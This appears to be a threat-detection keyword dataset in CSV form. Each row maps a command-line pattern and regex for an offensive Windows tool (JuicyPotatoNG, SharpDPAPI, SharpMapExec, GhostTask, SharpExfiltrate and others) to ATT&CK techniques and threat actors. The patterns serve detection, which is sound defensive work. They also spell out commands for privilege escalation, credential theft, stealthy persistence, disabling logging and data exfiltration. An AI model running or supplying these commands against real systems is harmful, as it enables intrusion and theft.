"*.exe krbscm -c *cmd.exe*",".{0,1000}\.exe\skrbscm\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4511"
"*.exe krbscm*",".{0,1000}\.exe\skrbscm.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","4512"
"*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{B91D5831\-B1BD\-4608\-8198\-D72E155020F7\}.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","4513"
"*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{F7FD3FD6\-9994\-452D\-8DA7\-9A8FD87AEEF4\}\s\-a.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","4514"
"*.exe --LDAPs --DisableSigning*",".{0,1000}\.exe\s\-\-LDAPs\s\-\-DisableSigning.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","4515"
"*.exe --lhost 127.0.0.1 --lport * --rhost *",".{0,1000}\.exe\s\-\-lhost\s127\.0\.0\.1\s\-\-lport\s.{0,1000}\s\-\-rhost\s.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","N/A","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","4516"
"*.exe -linpeas=*",".{0,1000}\.exe\s\-linpeas\=.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4517"
"*.exe --list-vulns*",".{0,1000}\.exe\s\-\-list\-vulns.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","4518"
"*.exe localhost add * ""cmd.exe"" ""/c *"" *daily*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}daily.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4519"
"*.exe localhost add * ""cmd.exe"" ""/c *"" *logon*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}logon.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4520"
"*.exe localhost add * ""cmd.exe"" ""/c *"" *second*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}second.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4521"
"*.exe localhost add * ""cmd.exe"" ""/c *"" *weekly*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}weekly.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4522"
"*.exe localhost add * ""cmd.exe"" ""/c *"" *weekly*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}weekly.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4523"
"*.exe -lolbas*",".{0,1000}\.exe\s\-lolbas.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4524"
"*.exe -m exec -c ""whoami /priv*",".{0,1000}\.exe\s\-m\sexec\s\-c\s\""whoami\s\/priv.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4525"
"*.exe -m exec -s -e S-1-5-20*",".{0,1000}\.exe\s\-m\sexec\s\-s\s\-e\sS\-1\-5\-20.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4526"
"*.exe -m find -r tcb*",".{0,1000}\.exe\s\-m\sfind\s\-r\stcb.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4527"
"*.exe -m sid -l -s S-1-5-18*",".{0,1000}\.exe\s\-m\ssid\s\-l\s\-s\sS\-1\-5\-18.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4528"
"*.exe machinemasterkeys*",".{0,1000}\.exe\smachinemasterkeys.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4529"
"*.exe machinetriage*",".{0,1000}\.exe\smachinetriage.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4530"
"*.exe machinevaults*",".{0,1000}\.exe\smachinevaults.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4531"
"*.exe masterkeys /hashes*",".{0,1000}\.exe\smasterkeys\s\/hashes.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4532"
"*.exe masterkeys /hashes*",".{0,1000}\.exe\smasterkeys\s\/hashes.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4533"
"*.exe masterkeys /pvk:*",".{0,1000}\.exe\smasterkeys\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4534"
"*.exe McAfeeSitelistFiles*",".{0,1000}\.exe\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4535"
"*.EXE Meterpreter Reverse HTTP and HTTPS loader*",".{0,1000}\.EXE\sMeterpreter\sReverse\sHTTP\sand\sHTTPS\sloader.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","4536"
"*.exe --Method ShellWindows --ComputerName * --Command *",".{0,1000}\.exe\s\-\-Method\sShellWindows\s\-\-ComputerName\s.{0,1000}\s\-\-Command\s.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","4537"
"*.exe ModifiableScheduledTask*",".{0,1000}\.exe\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4538"
"*.exe ModifiableServiceBinaries*",".{0,1000}\.exe\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4539"
"*.exe ModifiableServiceRegistryKeys*",".{0,1000}\.exe\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4540"
"*.exe ModifiableServices*",".{0,1000}\.exe\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4541"
"*.exe monitor /interval:5 /nowrap",".{0,1000}\.exe\smonitor\s\/interval\:5\s\/nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation  Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4542"
"*.exe NonstandardProcesses*",".{0,1000}\.exe\sNonstandardProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4543"
"*.exe ntlm cim * /m:check_pslockdown*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:check_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4544"
"*.exe ntlm cim * /m:check_pslogging*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:check_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4545"
"*.exe ntlm cim * /m:disable_pslockdown*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:disable_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4546"
"*.exe ntlm cim * /m:disable_pslogging*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:disable_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4547"
"*.exe ntlm cim * /m:disable_winrm*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:disable_winrm.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4548"
"*.exe ntlm cim * /m:enable_winrm*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:enable_winrm.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4549"
"*.exe ntlm cim * /user:*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/user\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4550"
"*.exe ntlm ldap * /m:spraydata*",".{0,1000}\.exe\sntlm\sldap\s.{0,1000}\s\/m\:spraydata.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4551"
"*.exe ntlm ldap * /password:*",".{0,1000}\.exe\sntlm\sldap\s.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4552"
"*.exe ntlm reg32 * /m:check_pslockdown*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/m\:check_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4553"
"*.exe ntlm reg32 * /m:check_pslogging*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/m\:check_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4554"
"*.exe ntlm reg32 * /m:disable_pslockdown*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/m\:disable_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4555"
"*.exe ntlm reg32 * /ntlm:*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/ntlm\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4556"
"*.exe ntlm smb * /m:shares*",".{0,1000}\.exe\sntlm\ssmb\s.{0,1000}\s\/m\:shares.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4557"
"*.exe ntlm smb * /ntlm:*",".{0,1000}\.exe\sntlm\ssmb\s.{0,1000}\s\/ntlm\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4558"
"*.exe ntlm winrm * /m:assembly /p:*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:assembly\s\/p\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4559"
"*.exe ntlm winrm * /m:comsvcs*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:comsvcs.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4560"
"*.exe ntlm winrm * /m:download*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:download.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4561"
"*.exe ntlm winrm * /m:exec /a:*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:exec\s\/a\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4562"
"*.exe ntlm winrm * /m:secrets*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:secrets.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4563"
"*.exe ntlm winrm * /m:upload*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:upload.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4564"
"*.exe ntlm winrm * /password:*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4565"
"*.exe NTLMSettings*",".{0,1000}\.exe\sNTLMSettings.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4566"
"*.exe OneDrive --username * --password * --filepath *\*.exe*",".{0,1000}\.exe\sOneDrive\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-filepath\s.{0,1000}\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","4567"
